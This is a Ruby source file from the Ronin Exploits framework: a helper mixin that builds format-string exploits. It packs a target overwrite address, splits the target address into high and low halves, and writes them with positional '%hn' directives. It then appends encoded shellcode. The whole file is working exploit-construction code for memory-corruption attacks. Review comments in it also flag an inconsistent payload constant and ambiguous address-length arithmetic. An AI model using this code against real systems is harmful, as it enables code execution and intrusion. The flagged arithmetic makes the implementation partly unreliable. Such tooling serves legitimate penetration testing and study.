#
# Ronin Exploits - A Ruby library for Ronin that provides exploitation and
# payload crafting functionality.
#
# Copyright (c) 2007-2009 Hal Brodigan (postmodern.mod3 at gmail.com)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
#

require 'ronin/exploits/targets/format_string'
require 'ronin/exploits/helpers/binary'
require 'ronin/payloads/shellcode'

module Ronin
  module Exploits
    module Helpers
      #
      # Helper mixin for exploits that deliver their payload through a
      # format string. It is meant to be `extend`ed onto an exploit
      # object; the `extended` hook below pulls in the Binary helper as
      # well. Methods such as `targets`, `target`, `verify_target!`,
      # `pack` and `encoded_payload` are called here but not defined in
      # this file (presumably provided by the exploit object and by
      # Helpers::Binary; confirm against those definitions).
      #
      module FormatString
        #
        # Hook invoked when this module is extended onto `obj`.
        #
        # @param [Object] obj
        #   The exploit object that extended this module.
        #
        def self.extended(obj)
          obj.instance_eval do
            # Binary helper is always extended alongside this module
            # (presumably supplies `pack` used in build_format_string).
            extend Ronin::Exploits::Helpers::Binary
          end
        end

        #
        # @return [String]
        #   The format string of the exploit. Lazily initialised to an
        #   empty String until `build` assigns it.
        #
        def format_string
          @format_string ||= ''
        end

        #
        # Adds a new target to the exploit.
        #
        # @param [Hash] attributes
        #   Additional attributes to create the target with.
        #
        # @yield [target]
        #   If a block is given, it will be passed the newly created target.
        #
        # @yieldparam [Targets::FormatString] target
        #   The newly created target.
        #
        # @return [Array]
        #   Whatever `self.targets << ...` returns (the targets collection;
        #   `targets` is not defined in this file).
        #
        def targeting(attributes={},&block)
          self.targets << Targets::FormatString.new(attributes,&block)
        end

        #
        # @return [Payloads::Shellcode]
        #   The model which will be searched for acceptable payloads.
        #
        # @since 0.3.0
        #
        # NOTE(review): the tag above names `Payloads::Shellcode` (matching
        # the `ronin/payloads/shellcode` require) but the body references
        # `Payload::Shellcode`; confirm which constant actually resolves
        # in the including namespace.
        #
        def use_payload_class
          Payload::Shellcode
        end

        protected

        #
        # Builds a format string using the current target and payload to
        # be used in the format string exploit.
        #
        # The result is: the two packed overwrite addresses, then two
        # `%.<N>d` padding directives each followed by a positional
        # `%<i>$hn` directive, then `encoded_payload`.
        #
        # @return [String]
        #   The built format string.
        #
        # @raise
        #   Whatever `verify_target!` raises when no usable target is set
        #   (not defined in this file).
        #
        def build_format_string
          verify_target!

          # Two packed addresses: the overwrite address and the same
          # address advanced by half of `arch.address_length`.
          buffer = pack(target.overwrite) + pack(target.overwrite + (target.arch.address_length / 2))

          # Build a contiguous mask of low-order bits: starts at 0xff and
          # is widened by one byte per iteration, `address_length/2` times.
          low_mask = 0xff

          (target.arch.address_length/2).times do
            low_mask <<= 8
            low_mask |= 0xff
          end

          # The high mask is the low mask shifted left by
          # `address_length*4` bits.
          # NOTE(review): the shift/mask amounts mix `address_length/2`,
          # `address_length*4` and `address_length*2`; whether each is a
          # bit or byte count depends on Arch#address_length, which is not
          # defined here -- confirm against the Arch model.
          high_mask = low_mask << (target.arch.address_length*4)

          high = (target.address & high_mask) >> (target.arch.address_length/2)
          low = target.address & low_mask

          # The smaller of the two values is emitted first; it is reduced
          # by `address_length*2` before formatting, and the second
          # directive carries only the difference between the two values.
          # `pop_length` and `pop_length+1` select which of the two packed
          # addresses each `%hn` refers to.
          if low < high
            low -= (target.arch.address_length*2)

            buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",low,target.pop_length,high-low,target.pop_length+1)
          else
            high -= (target.arch.address_length*2)

            buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",high,target.pop_length+1,low-high,target.pop_length)
          end

          # `buffer` is a fresh String from the `+` above, so the in-place
          # append does not alias any caller-owned object.
          buffer << encoded_payload
          return buffer
        end

        #
        # The default builder method which simply calls build_format_string
        # and sets the +@format_string+ instance variable.
        #
        # @return [String]
        #   The newly built format string (also readable via `format_string`).
        #
        def build
          @format_string = build_format_string
        end
      end
    end
  end
end